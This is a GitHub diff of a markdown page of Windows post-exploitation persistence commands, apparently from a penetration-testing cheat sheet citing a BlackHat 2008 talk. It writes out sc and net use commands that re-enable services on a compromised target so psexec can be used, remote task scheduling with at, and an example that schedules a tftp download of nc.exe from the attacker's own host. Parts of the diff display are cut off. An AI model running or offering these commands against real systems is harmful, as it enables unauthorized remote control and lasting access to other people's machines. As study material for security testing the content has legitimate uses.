You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: persistence/windows/general.md
+17-8Lines changed: 17 additions & 8 deletions
Original file line number
Diff line number
Diff line change
@@ -17,13 +17,13 @@ Commands to run to maintain persistence after you have exploited it and are usua
17
17
### Enable `psexec`
18
18
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
19
19
20
-
``c:\> net use \\target\ipc$ username /user:password
21
-
c:\> sc \\target config netdde start= auto
22
-
c:\> sc \\target config netddedsdm start= auto
23
-
c:\> sc \\target config clipsrv start= auto
24
-
c:\> sc \\target start netdde
25
-
c:\> sc \\target start netddedsdm
26
-
c:\> sc \\target start clipsrv
20
+
``c:\> net use \\[TargetIP]\ipc$ username /user:password
21
+
c:\> sc \\[TargetIP] config netdde start= auto
22
+
c:\> sc \\[TargetIP] config netddedsdm start= auto
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
71
+
72
+
``c:\> net use \\[TargetIP]\ipc$ password /user:username
73
+
c:\> at \\[TargetIP] 12:00 pm command
74
+
``
75
+
76
+
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
0 commit comments